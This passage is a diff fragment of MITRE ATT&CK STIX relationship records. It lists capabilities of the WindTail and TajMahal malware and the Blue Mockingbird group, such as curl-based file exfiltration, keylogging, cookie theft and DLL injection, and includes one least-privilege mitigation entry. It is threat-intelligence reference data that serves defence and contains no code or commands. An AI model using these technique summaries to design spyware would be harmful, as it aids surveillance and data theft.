+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has the ability to enumerate the users home directory and the path to its own application bundle.(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1fe64d85-29ca-4cf0-9b30-8d41ebad37fc",
+ "type": "relationship",
+ "modified": "2020-06-25T18:41:35.200Z",
+ "created": "2020-06-04T19:45:16.047Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has the ability to receive and execute a self-delete command.(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d0f83de0-975e-4cc2-8423-e91549f952d9",
+ "type": "relationship",
+ "modified": "2020-06-04T19:45:16.052Z",
+ "created": "2020-06-04T19:45:16.052Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has the ability to automatically exfiltrate files using the macOS built-in utility /usr/bin/curl.(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d811dad0-a813-4293-81fc-55e8ea6a54be",
+ "type": "relationship",
+ "modified": "2020-06-25T18:24:00.683Z",
+ "created": "2020-06-04T20:14:50.400Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has the ability to use the macOS built-in zip utility to archive files.(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9284f651-5078-4b67-90dd-841397029edd",
+ "type": "relationship",
+ "modified": "2020-06-04T20:14:50.442Z",
+ "created": "2020-06-04T20:14:50.442Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has the ability to use HTTP for C2 communications.(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5b8e36dd-264d-45dc-ab38-500b5eb17c33",
+ "type": "relationship",
+ "modified": "2020-06-25T03:46:58.347Z",
+ "created": "2020-06-04T20:14:50.450Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal written CD images and files of interest from previously connected removable drives when they become available again.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--cad9bdcc-41b3-44e2-98d2-fb07fe268838",
+ "type": "relationship",
+ "modified": "2020-06-08T17:03:53.050Z",
+ "created": "2020-06-08T16:57:20.194Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture VoiceIP application audio on an infected host.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--404dfda0-7019-4f0e-a831-4b7c594916e8",
+ "type": "relationship",
+ "modified": "2020-06-08T16:57:20.219Z",
+ "created": "2020-06-08T16:57:20.219Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to take screenshots on an infected host including capturing content from windows of instant messaging applications.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3edc3698-c8a9-4212-b34e-1f3a44fbd00d",
+ "type": "relationship",
+ "modified": "2020-06-08T17:22:35.647Z",
+ "created": "2020-06-08T16:57:20.222Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal documents from the local system including the print spooler queue.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ea05b76d-c443-4b41-8d02-d90b965bd184",
+ "type": "relationship",
+ "modified": "2020-06-11T20:08:11.552Z",
+ "created": "2020-06-08T16:57:20.227Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) can set the KeepPrintedJobs attribute for configured printers in SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers to enable document stealing.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--91c175b7-5c8e-4534-82b1-9bdb1b709a34",
+ "type": "relationship",
+ "modified": "2020-06-08T16:57:20.234Z",
+ "created": "2020-06-08T16:57:20.234Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to inject DLLs for malicious plugins into running processes.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c7d6694e-cfbf-4883-9f4c-8fb3f187e6ae",
+ "type": "relationship",
+ "modified": "2020-06-15T21:19:30.884Z",
+ "created": "2020-06-08T17:03:52.979Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal web session cookies from Internet Explorer, Netscape Navigator, FireFox and RealNetworks applications.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b9b622ad-856a-48f9-a768-ef05bd2914fe",
+ "type": "relationship",
+ "modified": "2020-06-08T17:03:53.022Z",
+ "created": "2020-06-08T17:03:53.022Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
+ "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90",
+ "relationship_type": "mitigates",
+ "description": "Limit permissions for creating, deleting, and otherwise altering compute components in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.(Citation: Mandiant M-Trends 2020)",
+ "id": "relationship--0b74039a-c985-4587-bed7-0876f2ef1e6c",
+ "external_references": [
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
+ }
+ ],
+ "type": "relationship",
+ "modified": "2020-06-18T11:38:27.813Z",
+ "created": "2020-06-08T17:06:00.709Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to index and compress files into a send queue for exfiltration.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5197fd7a-766f-45da-87f5-c469377460d1",
+ "type": "relationship",
+ "modified": "2020-06-15T21:19:30.918Z",
+ "created": "2020-06-08T17:22:35.549Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to index files from drives, user profiles, and removable drives.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--bfd1c3ca-ea2c-4b0e-8b0a-815b8ebb4dfb",
+ "type": "relationship",
+ "modified": "2020-06-08T17:22:35.556Z",
+ "created": "2020-06-08T17:22:35.556Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to use the open source libraries XZip/Xunzip and zlib to compress files.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--120b6ead-4c4a-4f99-8509-d4ae3d4afea6",
+ "type": "relationship",
+ "modified": "2020-06-15T21:01:55.437Z",
+ "created": "2020-06-08T17:22:35.613Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify which anti-virus products, firewalls, and anti-spyware products are in use.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--44aab0bc-80d5-4c6b-9acf-ceb9cc30f443",
+ "type": "relationship",
+ "modified": "2020-06-08T18:06:36.276Z",
+ "created": "2020-06-08T18:06:36.276Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify the Internet Explorer (IE) version on an infected host.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8455e704-68fd-4610-b63d-0d124a660802",
+ "type": "relationship",
+ "modified": "2020-06-08T18:06:36.281Z",
+ "created": "2020-06-08T18:06:36.281Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify connected Apple devices.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ee1558f7-5b93-49c7-89c8-b3151cbefb84",
+ "type": "relationship",
+ "modified": "2020-06-08T18:06:36.311Z",
+ "created": "2020-06-08T18:06:36.311Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify the MAC address on an infected host.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--97e042c8-f1fe-4980-bc08-86cb7c6e1fc9",
+ "type": "relationship",
+ "modified": "2020-06-08T18:06:36.317Z",
+ "created": "2020-06-08T18:06:36.317Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify hardware information, the computer name, and OS information on an infected host.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--179538d1-5770-42ef-976f-c0fd65faa1ea",
+ "type": "relationship",
+ "modified": "2020-06-08T18:06:36.319Z",
+ "created": "2020-06-08T18:06:36.319Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture keystrokes on an infected host.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--eda8746d-ef63-450b-ab75-c2c97d94db44",
+ "type": "relationship",
+ "modified": "2020-06-08T18:06:36.371Z",
+ "created": "2020-06-08T18:06:36.371Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal data from the clipboard of an infected host.(Citation: Kaspersky TajMahal April 2019)\n",
+ "relationship_type": "uses",
+ "id": "relationship--f283af63-1fdf-49d3-8a56-304c5be07a83",
+ "type": "relationship",
+ "modified": "2020-06-08T18:06:36.376Z",
+ "created": "2020-06-08T18:06:36.376Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to manage an automated queue of egress files and commands sent to its C2.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9cc4cd5d-7b10-4dd7-8fd9-90288aa8b5be",
+ "type": "relationship",
+ "modified": "2020-06-15T21:19:30.968Z",
+ "created": "2020-06-08T18:06:36.380Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to send collected files over its C2.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--655005cc-a289-4878-8dc0-64f0c7d167c4",
+ "type": "relationship",
+ "modified": "2020-06-15T21:19:30.982Z",
+ "created": "2020-06-08T18:06:36.384Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify running processes and associated plugins on an infected host.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7f31ac80-5e21-4449-8bb3-9c2ad943dc08",
+ "type": "relationship",
+ "modified": "2020-06-08T18:08:06.453Z",
+ "created": "2020-06-08T18:08:06.453Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Windows Registry modifications to specify a DLL payload.(Citation: RedCanary Mockingbird May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8b3f4fd5-9acd-49e5-bae5-6996ae46aa0f",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.809Z",
+ "created": "2020-06-08T19:45:34.975Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used wmic.exe to set environment variables.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--51548d6c-0aa9-4813-8493-3d9bbcd0617a",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.923Z",
+ "created": "2020-06-08T19:45:34.998Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has obfuscated the wallet address in the payload binary.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--85aecc08-dda1-4203-9dec-376f1d9d3cad",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:10.046Z",
+ "created": "2020-06-08T19:55:47.563Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
